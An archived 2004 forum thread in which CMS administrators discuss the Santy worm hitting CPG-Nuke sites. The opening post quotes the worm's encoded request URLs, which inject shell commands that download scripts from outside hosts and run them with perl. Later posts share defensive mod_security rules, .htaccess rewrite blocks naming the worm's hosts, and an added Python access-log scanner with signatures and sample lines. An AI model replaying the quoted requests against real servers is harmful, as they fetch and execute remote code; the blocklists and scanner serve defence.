Topic Archived
DJ Maze (Developer) - Joined: Apr 19, 2004, Posts: 5683, Location: http://tinyurl.com/5z8dmv
Posted: Sat Dec 25, 2004 2:25 pm  Post subject: Help CPG-Nuke is under attack LMAO
Are people that stupid?
They have been trying these all day already:
Code:
index.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20http://fff.gratishost.com/sess_0bc3910d07edb36750a9babbd179edb2;perl%20sess_0bc3910d07edb36750a9babbd179edb2;wget%20http://fff.gratishost.com/wow.a;perl%20wow.a%3B%
index.php?name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%25
index.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.t
DJ Maze's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Fedora 15 / 2.2.22 / 5.5.20 / 5.3.10 / CVS
xfsunoles (XHTML Specialist) - Joined: Apr 30, 2004, Posts: 2502, Location: Melbourne, Florida
Posted: Sat Dec 25, 2004 2:32 pm  Post subject: Re: Help CPG-Nuke is under attack LMAO
Wow, they don't stop launching the shell worm. Well, it was unsuccessful.
_________________
Firefox is my Favorite Browser
xfsunoles's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Apache/1.3.34 (Unix)/4.0.25-standard/4.4.1/CVS
Stephen (Silver Supporter) - Joined: Apr 21, 2004, Posts: 734
Posted: Sat Dec 25, 2004 3:22 pm  Post subject: Re: Help CPG-Nuke is under attack LMAO
I've stopped about 40 attempts so far with mod_security :D
Here's one simple line to add to your mod_security config (or, if your host has mod_security installed, add it to your .htaccess file) and it will stop them dead.
Code:
SecFilterSelective THE_REQUEST "wget "
I use a lot more than that, however, ranging from uname to XSS :D
Edit..
Here's my entire mod_security config file. All rules; they also stop the nmap version scan.
Code:
# mod_security 1.x rules. The filter engine has to be switched on for the
# filters below to take effect.
SecFilterEngine On
# Commands carried in the worm's payload
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "uname -a"
# Probes for Apache auth files
SecFilterSelective THE_REQUEST "\.htgroup"
SecFilterSelective THE_REQUEST "\.htaccess"
# Cross-site scripting
SecFilter "javascript\://"
SecFilter "img src=javascript"
# Directory traversal, cgi-bin and home-directory probes
SecFilterSelective THE_REQUEST "cd\.\."
SecFilterSelective THE_REQUEST "///cgi-bin"
SecFilterSelective THE_REQUEST "/cgi-bin///"
SecFilterSelective THE_REQUEST "/~root"
SecFilterSelective THE_REQUEST "/~ftp"
SecFilterSelective THE_REQUEST "/htgrep" chain
SecFilter "hdr=/"
SecFilterSelective THE_REQUEST "/htgrep" log,pass
SecFilterSelective THE_REQUEST "/\.history"
SecFilterSelective THE_REQUEST "/\.bash_history"
SecFilterSelective THE_REQUEST "/~nobody"
SecFilterSelective THE_REQUEST "<script"
SecFilterSelective THE_REQUEST "\?STRENGUR"
SecFilter "_PHPLIB\[libdir\]"
# nmap version-scan probe strings sent as the whole request line
SecFilterSelective THE_REQUEST "^(HELP|default|\||TNMP|DmdT|\:)$"
SecFilterSelective SCRIPT_FILENAME "export\.php$" chain
SecFilterSelective ARG_what "\.\."
# Catch-all for any HTML tag anywhere in a request; very broad, and it
# will also block legitimate form posts that contain tags
SecFilter "<(.|\n)+>"
Edit2: disabled smiles :'(
Stephen's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Cent OS :: 1.3.34 :: 4.1.13 :: 4.4.2 :: CVS
Last edited by Stephen on Sun Dec 26, 2004 5:13 pm; edited 1 time in total |
Mystic (Diamond Supporter) - Joined: Jun 25, 2004, Posts: 1312, Location: Spokane, WA USA
Posted: Sat Dec 25, 2004 4:29 pm  Post subject: Re: Help CPG-Nuke is under attack LMAO
DJ,
How are you detecting these attempts?
Stephen,
Where do you insert this code?
_________________
- |\/|ystic
Mystic's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Linux 2.6.20-16/Apache/5.0.38/5.2.1/9.0.6.1
DJ Maze (Developer) - Joined: Apr 19, 2004, Posts: 5683, Location: http://tinyurl.com/5z8dmv
Posted: Sat Dec 25, 2004 5:09 pm  Post subject: Re: Help CPG-Nuke is under attack LMAO
It's all in the "Who is where" block.
Mythical (Newbie) - Joined: Oct 13, 2004, Posts: 3
Posted: Sat Dec 25, 2004 5:26 pm  Post subject: Re: Help CPG-Nuke is under attack LMAO
DJMaze wrote:
    It's all in the "Who is where" block
You mean the same one this site doesn't use because
akamu wrote:
    We don't have the who is where activated because of the sheer number of visitors and the extra queries this adds to the load on mysql.
Seems more like it's activated but for admin only. A little honesty never hurt anyone.
DJ Maze (Developer) - Joined: Apr 19, 2004, Posts: 5683, Location: http://tinyurl.com/5z8dmv
Posted: Sat Dec 25, 2004 5:50 pm  Post subject: Re: Help CPG-Nuke is under attack LMAO
Apache logs.
By describing it as the block, it is more understandable for most people.
Jeruvy (Security Team) - Joined: Apr 23, 2004, Posts: 1432, Location: Canada
Posted: Sat Dec 25, 2004 8:29 pm  Post subject: Re: Help CPG-Nuke is under attack LMAO
Santy.C
Merry Christmas.
_________________
J.
j e r u v y a t y a h o o d o t c o m
Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net
Jeruvy's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2
Stephen (Silver Supporter) - Joined: Apr 21, 2004, Posts: 734
Posted: Sun Dec 26, 2004 4:25 am  Post subject: Re: Help CPG-Nuke is under attack LMAO
Mystic,
You have to have mod_security installed (server side) for that to work.
Then, after that, I believe you can put it in your httpd.conf or .htaccess file.
Mystic (Diamond Supporter) - Joined: Jun 25, 2004, Posts: 1312, Location: Spokane, WA USA
Posted: Sun Dec 26, 2004 4:52 am  Post subject: Re: Help CPG-Nuke is under attack LMAO
Thanks for the clarification Stephen.
DJ Maze (Developer) - Joined: Apr 19, 2004, Posts: 5683, Location: http://tinyurl.com/5z8dmv
Posted: Mon Dec 27, 2004 12:23 am  Post subject: Re: Help CPG-Nuke is under attack LMAO
Hey, 2 new sites:
midomain.false.ca <- down
envidiosos.org/~pillar/ <- still up
And the biggest fun: due to LEO, the worm URLs are totally messed up.
djdevon3 (Gold Supporter) - Joined: Aug 05, 2004, Posts: 4363
Posted: Mon Dec 27, 2004 12:56 am  Post subject: Re: Help CPG-Nuke is under attack LMAO
all hail the cows
djdevon3's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Linux/1.3.33/4.4/4.3.11
tank (Gold Supporter) - Joined: Apr 20, 2004, Posts: 824, Location: Houston, Texas USA
Posted: Mon Dec 27, 2004 1:54 am  Post subject: Re: Help CPG-Nuke is under attack LMAO
Based on several sites, I've added this to the top of my .htaccess.
Code:
# Check for Santy worms and redirect them to a phantom site
RewriteEngine On
# Variant-1: the worm fetches pages with Perl's LWP user agent
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
# Variant-2: the worm's download hosts appear in the query string
# (e.g. name=http://www.visualcoders.net/...), not in REQUEST_URI, which
# always begins with "/", so match QUERY_STRING and escape the literal dots
RewriteCond %{QUERY_STRING} visualcoders [NC,OR]
RewriteCond %{QUERY_STRING} midomain\.false\.ca [NC,OR]
RewriteCond %{QUERY_STRING} envidiosos\.org/~pillar/ [NC,OR]
# Variant-3: the rush= parameter that carries the encoded shell commands
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]
# end santy check
Anyone see any problem with that? I'm no .htaccess guru, but it seems to redirect any potential attacks elsewhere. I'm just not sure of the implications for CPG-Nuke. It will only be on 8.2, so I'm sure it won't interfere with LEO.
_________________
Search is your friend
tank's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Fedora Core 1, Apache 1.3.33, Mysql 4.1.14, PHP 5.0.5 w/ APC cache, Dragonfly 9.0.6.1
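An added example, not code from the thread or from DragonflyCMS: a small scanner that applies the signatures behind Stephen's mod_security rules and tank's rewrite conditions (wget, uname -a, the rush= parameter, the download hosts named above, the LWP user agent) to Apache access-log lines, which is where DJ Maze says he spots these attempts. It percent-decodes repeatedly so that the double-encoded highlight= payload (%2527 ... %252e) is matched in clear text. The regexes and the sample log lines (with a download host under .invalid) are constructed for this example.

```python
import re
from urllib.parse import unquote

# Signatures modelled on the rules posted in this thread; the regexes are
# this example's own, not Stephen's mod_security file or tank's .htaccess.
SIGNATURES = {
    "wget in request": re.compile(r"wget\s", re.I),
    "uname -a": re.compile(r"uname -a", re.I),
    "rush= parameter": re.compile(r"[?&]rush=[^&]+", re.I),
    "system(chr()) chain": re.compile(r"system\s*\(\s*chr\(", re.I),
    "known download host": re.compile(
        r"visualcoders\.net|midomain\.false\.ca|envidiosos\.org/~pillar/", re.I),
}
UA_SIGNATURE = re.compile(r"^LWP")  # tank's Variant-1: Perl LWP user agent

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

def normalize(text, max_rounds=3):
    """Percent-decode until stable (bounded) so %2527 -> %27 -> ' is seen in clear."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_line(line):
    """Return {"ip", "target", "hits"} for a matching log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, _status, agent = m.groups()
    norm = normalize(target)
    hits = [name for name, rx in SIGNATURES.items() if rx.search(norm)]
    if UA_SIGNATURE.search(agent):
        hits.append("LWP user agent")
    return {"ip": ip, "target": target, "hits": hits} if hits else None

def scan(lines):
    return [hit for hit in map(scan_line, lines) if hit]

# Constructed sample lines (download host under .invalid, not a real worm URL)
SAMPLE_LOG = [
    '10.0.0.1 - - [25/Dec/2004:14:25:01 +0000] "GET /index.php?name=Forums&rush=%65%63%68%6F%20x;cd%20/tmp;wget%20http://dl.invalid/s HTTP/1.0" 200 512 "-" "LWP::Simple/5.803"',
    '10.0.0.2 - - [25/Dec/2004:14:25:02 +0000] "GET /index.php?name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)) HTTP/1.0" 200 512 "-" "Mozilla/4.0"',
    '10.0.0.3 - - [25/Dec/2004:14:25:03 +0000] "GET /index.php?name=Forums&file=viewtopic&t=42 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
]
```

Run `scan(SAMPLE_LOG)` to get one record per suspicious line; the benign viewtopic request produces nothing.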
xfsunoles (XHTML Specialist) - Joined: Apr 30, 2004, Posts: 2502, Location: Melbourne, Florida
Posted: Mon Dec 27, 2004 1:57 am  Post subject: Re: Help CPG-Nuke is under attack LMAO
About the redirect URL: what is the best URL to pick?
djdevon3 (Gold Supporter) - Joined: Aug 05, 2004, Posts: 4363
Posted: Mon Dec 27, 2004 2:04 am  Post subject: Re: Help CPG-Nuke is under attack LMAO
How about locators.com? It's responsible for some of the admin referral spamming. Spam the spammers!